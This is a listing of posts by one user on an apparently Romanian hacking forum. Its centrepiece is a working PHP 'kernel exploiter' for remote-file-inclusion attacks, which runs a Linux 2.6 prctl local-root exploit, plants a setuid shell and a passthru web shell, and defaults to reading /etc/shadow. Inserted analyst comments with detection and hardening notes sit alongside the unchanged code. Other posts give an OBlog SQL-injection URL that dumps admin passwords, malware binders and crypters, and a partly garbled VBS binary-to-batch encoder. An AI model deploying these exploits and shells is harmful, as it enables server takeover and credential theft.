
alexcargo

  1. Analizeaza Malware

    http://analysis.seclab.tuwien.ac.at/
  2. Any2Bat

    dupa cum spune si titlu converteaza orice in .bat
  3. PHP KERNEL EXPLOITER

    <?php
    /*
     * Kernel Exploiter for use in RFI bugs.
     *
     * Analyst annotation (comments only; the code below is unchanged).
     *
     * What the visible code does:
     *  - Proceeds only when php_uname() contains both "Linux" and "2.6."; the
     *    form further down labels the technique "Prctl 2.6.x exploit".
     *  - Writes /tmp/a.sh, runs it to emit /tmp/getsuid.c and /tmp/s.c, and
     *    builds both with the compiler path taken from the hidden "compiler"
     *    form field.
     *  - getsuid.c raises RLIMIT_CORE, has a child chdir() to /etc/cron.d and
     *    call prctl(PR_SET_DUMPABLE, 2), then the parent sends it SIGSEGV.
     *    The string embedded in that binary is cron-formatted text that would
     *    make /tmp/s root-owned and setuid; presumably the intent is for the
     *    core file to land in /etc/cron.d.
     *  - Writes a second PHP file, at the path given in the "php" field, that
     *    passes a request parameter to passthru().
     *  - Deletes /tmp/getsuid*, /tmp/s.c and /tmp/a.sh when it finishes.
     *  - POST, GET and ENV values are concatenated into shell commands, C
     *    source and file paths with no validation anywhere in the script.
     *
     * Host artefacts to look for during triage (all taken from the code):
     *  - /tmp/a.sh, /tmp/test.sh, /tmp/getsuid, /tmp/getsuid.c, /tmp/s, /tmp/s.c
     *  - files named core* under /etc/cron.d
     *  - a setuid-root binary in /tmp
     *  - hidden files .ash, .zsh or .shell.php in the web application's
     *    working directory (the form's default values)
     *  - the web server account spawning sh, cc or gcc
     *
     * Hardening that breaks this chain: a kernel with the prctl core-dump
     * handling fixed, /tmp mounted noexec,nosuid, no compiler reachable by the
     * web server account, passthru/system listed in PHP's disable_functions,
     * remote includes disabled (allow_url_include=Off), and a web root that
     * the PHP user cannot write to.
     */
    set_time_limit(0); if(isset($_POST['exploit_it'])) { if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) { if($_POST['compiler'] == "none") { echo '<div align="center"><h4>No compiler found! Can not continue.</h4></div>'; end; } $cc = $_POST['compiler'];
    /* Text of the shell script later written to /tmp/a.sh; its two here-documents carry the C sources. $_POST['shell'] and $_ENV["TMPDIR"] are concatenated in unescaped. */
    $prctl = '#!/bin/sh cat > /tmp/getsuid.c << __EOF__ #include <stdio.h> #include <sys/time.h> #include <sys/resource.h> #include <unistd.h> #include <linux/prctl.h> #include <stdlib.h> #include <sys/types.h> #include <signal.h> char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n"; int main() { int child; struct rlimit corelimit; corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); if ( !( child = fork() )) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(200); exit(1); } kill(child, SIGSEGV); sleep(120); } __EOF__ cat > /tmp/s.c << __EOF__ #include<stdio.h> main(void) { setgid(0); setuid(0); if (getuid() == 0) { printf("\n[+] We have root!\n\n" ); system("/bin/sh"); system("$_POST[cmd]"); '; if(!stristr($_POST['shell'],"could not be found")) { $prctl .= 'system("cp /bin/ash '.$_POST['shell'].'");'; } $prctl .= 'system("rm -rf /tmp/s"); system("rm -rf /etc/cron.d/core*"); system("exit"); } else { printf("\n[-] Failed.\n\n" ); system("rm -rf '.$_ENV["TMPDIR"].'/s"); } return 0; } __EOF__ ';
    /* Second dropped file: a PHP page that hands a request parameter to passthru(); it is written to the path supplied in $_POST['php']. */
    $phpwrapper = '<?php if(isset($_GET[cmd])) { echo "<pre>"; echo passthru("'.$_POST['shell'].' -c \"$_GET[cmd]\""); echo "</pre>"; } ?>'; echo "<pre><div align='center'>"; $h = fopen("/tmp/a.sh", "w"); fwrite($h,$prctl); fclose($h); $handle = fopen($_POST['php'], "w"); fwrite($handle, $phpwrapper); fclose($handle); echo "Building exploit.... 
"; echo passthru("sh /tmp/a.sh"); echo passthru("$cc -o /tmp/s /tmp/s.c"); echo passthru("$cc -o /tmp/getsuid /tmp/getsuid.c"); echo "Running exploit...waiting about 4 minutes to see if exploit worked "; echo passthru("/tmp/getsuid"); echo passthru("/tmp/s"); echo "Cleaning up "; echo passthru("rm -rf /tmp/getsuid*"); echo passthru("rm -rf /tmp/s.c"); echo passthru("rm -rf /tmp/a.sh"); echo "Done! </div> </pre>"; } else { echo "Kernel version IS NOT 2.6.x or is a version known to not work: ".php_uname(); } } else { ?> <div align="center"> <h4>PHP Attack Script</h4> <h5><?php echo php_uname(); ?></h5> <pre><div align="center"> Checking for temp Directory.........<?php echo $_ENV["TMPDIR"]."\n"; ?> Checking for cc or gcc............<?php $path = explode(":",$_ENV["PATH"]); $gotcc = FALSE; $gotgcc = FALSE; foreach($path as $dir) { if(is_file($dir."/cc") && $gotgcc == FALSE && $gotcc == FALSE) { $gotcc = TRUE; $pathtocc = $dir."/cc"; echo '[ <font color="#00CC00">OK</font> ]'."\n"; break; } elseif($gotcc == FALSE && $gotgcc == FALSE && is_file($dir."/gcc")) { $gotgcc = TRUE; $pathtogcc = $dir."/gcc"; echo '[ <font color="#00CC00">OK</font> ]'."\n"; break; } } if($gotcc == FALSE && $gotgcc == FALSE) { echo '[ <font color="#FF0000">Failed</font> ]'."\n"; } ?> Checking for execute permissions..<?php $h = fopen("/tmp/test.sh","w"); fwrite($h,"#!/bin/sh"); fclose($h); system("sh /tmp/test.sh",$returnval); if($returnval == 0) { echo '[ <font color="#00CC00">OK</font> ]'."\n"; } else { echo '[ <font color="#FF0000">Failed</font> ]'."\n"; } passthru("rm -rf /tmp/test.sh"); ?> </pre></div> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> <table border="0" cellspacing="0"> <tr> <td><div align="right">Exploit:</div></td> <td> <select name="exploit"> <option selected="selected">Prctl 2.6.x exploit</option> </select> </td> </tr> <tr> <td><div align="right">Location and name for root shell:</div></td> <td><input type="text" name="shell" size="50" value="<?php 
if(file_exists("/bin/ash")) { echo getcwd()."/.ash"; } elseif(file_exists("/bin/zsh")) { echo getcwd()."/.zsh"; } else { echo "/bin/ash or /bin/zsh could not be found!"; } ?>"/></td> </tr> <tr> <td><div align="right">Location and name for php shell wrapper: </div></td> <td><input type="text" name="php" size="50" value="<?php echo getcwd()."/.shell.php" ?>" /></td> </tr> <tr> <td><div align="right">Commands to perform while root seperate multiple commands with ; : </div></td> <td><input type="text" name="cmd" size="50" value="cat /etc/shadow" /></td> </tr> </table> </div> <div align="center"> <input type="hidden" name="compiler" value="<?php if(isset($pathtocc)) { echo $pathtocc; } elseif(isset($pathtogcc)) { echo $pathtogcc; } else { echo 'none'; } ?>" /> <input type="hidden" name="exploit_it" value="doit" /> <input name="submit" type="submit" value="Submit" /> After pressing submit it may take up to 4 minutes for the page to load depending on exploit. This is due to the exploit being run. If exploit fails the system may be patched or kernel may not be vuln. </div> </form> <?php } ?>
  4. milw0rm php shell public

    mersi ping dar eu am gasit chestia asta nu facuta de mine uni au facu phpshell asta si ia zis asa milw0rm nu e official dar in alte parti pe alte forumuri lumea imi sare in cap dar ei nu inteleg bine cuvantul sharing ma rog nu dau 2 bani pe ei.
  5. Scan your network for devices online

    Are you aware of all the devices – USB sticks, CDs, floppies, smartphones, MP3 players, handhelds, iPods, digital cameras – that have been connected to your network? As an administrator, do you know how many employees have been using or are using portable storage devices at the moment? Monitoring your network for these devices is not only time-consuming but nearly impossible to do manually. http://www.endpointscan.com/
  6. milw0rm php shell public

    http://www.mytempdir.com/1314256 misto imi place :wink: Enjoy
  7. Word Exe Exploiter

    http://www.mytempdir.com/1314235
  8. OBlog 4.x (JS.ASP)

    Google dork inurl:/blog/js.asp http://www.site.com/blog/js.asp?n=1&j=13&tid=1) and 1=2 union select username,password,3,4,5,6 from oblog_admin where id=(1
  9. DNS Exploit Compilat 1si 2

    Exploitu 1 http://www.mytempdir.com/1314191 Exploitu 2 http://www.mytempdir.com/1314292 Enjoy :wink:
  10. Any2Bat

    ' Analyst annotation (comments only; the script text below is unchanged).
    ' Windows Script Host encoder. It reads the file named by the first
    ' argument as binary through ADODB.Stream and writes "<argument>.bat".
    ' That batch file echoes an encoded copy of the input into xx.vbs, runs it
    ' with "cscript.exe //nologo xx.vbs" and then deletes xx.vbs. The generated
    ' xx.vbs decodes the data (function ub64) and saves it under the original
    ' file name with ADODB.Stream savetofile.
    ' "on error resume next" plus the wscript.quit checks make it exit silently
    ' on any failure.
    ' Detection pointers: batch files made of "@echo ...>>xx.vbs" lines that end
    ' by invoking cscript.exe, cmd.exe spawning cscript.exe on a script it has
    ' just written, and script hosts creating files via ADODB.Stream. Restricting
    ' or disabling Windows Script Host where it is not needed removes the
    ' decode step.
    ' NOTE(review): this listing has had its line breaks collapsed, and the two
    ' "if i" / "if i+1" tests inside b64b are incomplete as extracted, so the
    ' text is not a faithful copy of the original script.
    on error resume next set arg=wscript.arguments if arg.count=0 then wscript.quit with CreateObject("ADODB.Stream") .type=1:.open:.loadfromfile arg(0):bs=.read:l=.size:.close end with if err.number<>0 then wscript.quit set fso=CreateObject("Scripting.FileSystemObject") with fso.opentextfile(arg(0)&".bat",2,true) if err.number<>0 then wscript.quit .writeline "@echo bs=_>xx.vbs" for k=1 to l step 129 .write "@echo """ .write b64b(midb(bs,k,129)) .writeline """+_>>xx.vbs" next .writeline "@echo """":set rs=CreateObject(""ADODB.Recordset"")>>xx.vbs" .writeline "@echo set ado=CreateObject(""ADODB.Stream"")>>xx.vbs" .writeline "@echo l=len(bs):ss="""":for k=1 to l step 4096:ss=ss+ub64(mid(bs,k,4096)):next:l=len(ss)>>xx.vbs" .writeline "@echo rs.fields.append ""b"",205,l/2:rs.open:rs.addnew:rs(""b"")=ss+chrb(0):rs.update>>xx.vbs" .writeline "@echo ado.mode=3:ado.type=1:ado.open:ado.write rs(""b"").getchunk(l/2)>>xx.vbs" .writeline "@echo ado.savetofile """+fso.getfilename(arg(0))+""",2:ado.close>>xx.vbs" .writeline "@echo function ub64(s):dim t(4),b(3):ub64="""":n=len(s):r=2 >>xx.vbs" .writeline "@echo if n mod 4^<^>0 then exit function:end if:for i=1 to n step 4:for j=0 to 3 >>xx.vbs" .writeline "@echo a=asc(mid(s,i+j,1)):if a=43 then:a=62:else if a=47 then:a=63:else if a^>47 and a^<58 then:_>>xx.vbs" .writeline "@echo a=a+4:else if a=61 then:a=0:if r=2 then r=j-2:end if:else if a^>64 and a^<91 then:_>>xx.vbs" .writeline "@echo a=a-65:else if a^>96 and a^<123 then:a=a-71:else:exit function:_>>xx.vbs" .writeline "@echo end if:end if:end if:end if:end if:end if:t(j)=a:next>>xx.vbs" .writeline "@echo b(0)=t(0)+t(1)*64 mod 256:b(1)=t(1)\4+t(2)*16 mod 256:b(2)=t(2)\16+t(3)*4 >>xx.vbs" .writeline "@echo for j=0 to r:if b(j)^<16 then ub64=ub64+""0"":end if:ub64=ub64+hex(b(j))>>xx.vbs" .writeline "@echo next:next:end function>>xx.vbs&&cscript.exe //nologo xx.vbs&del xx.vbs" end with const b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" function 
b64b(bin) b64b="" n=lenb(bin) for i=1 to n step 3 a=ascb(midb(bin,i,1)) b64b=b64b+mid(b64,a mod 64+1,1) if i b=ascb(midb(bin,i+1,1)) b64b=b64b+mid(b64,(a\64+b*4)mod 64+1,1) if i+1 c=ascb(midb(bin,i+2,1)) b64b=b64b+mid(b64,(b\16+c*16)mod 64+1,1) b64b=b64b+mid(b64,c\4+1,1) else b64b=b64b+mid(b64,b\16+1,1) b64b=b64b+"=" end if else b64b=b64b+mid(b64,a\64+1,1) b64b=b64b+"==" end if next end function copiatil intr-un fisier text si salvati ca Any2Bat.vbs sau cu ce nume doriti
  11. aici este video tutorialul http://thinstall.com/demos/vs_intro.zip ENjoy
  12. mucki's protector

    un un protector pe http://www.mytempdir.com/1300600
  13. ABC joiner v1.23 + Source

    un binder plus codu sursa http://www.mytempdir.com/1300595
  14. gbinder v1.0 2007

    un binder http://www.mytempdir.com/1300593
  15. RPolyCrypt 1.0b

    bun cryptor http://www.mytempdir.com/1300591